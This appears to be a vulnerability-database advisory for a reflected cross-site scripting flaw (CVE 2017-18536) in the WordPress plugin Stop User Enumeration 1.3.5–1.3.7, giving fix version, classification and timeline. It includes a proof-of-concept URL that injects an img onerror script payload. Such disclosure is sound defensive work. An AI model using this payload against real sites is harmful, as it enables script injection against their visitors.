Stop User Enumeration 1.3.5-1.3.7 - Unauthenticated Reflected Cross-Site Scripting (XSS)



Proof of Concept
http://www.example.com/?author=1<img src=x onerror=javascript:prompt(document.domain)> 

Affects Plugin

fixed in version 1.3.8

References

CVE 2017-18536
URL https://plugins.trac.wordpress.org/changeset/1575129/stop-user-enumeration

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Zee Shan
Submitter Twitter @z33_5h4n
Views 4306
Verified No
WPVDB ID 8723

Timeline

Publicly Published 2017-01-15 (almost 3 years ago)
Added 2017-01-17 (almost 3 years ago)
Last Updated 2019-11-28 (13 days ago)
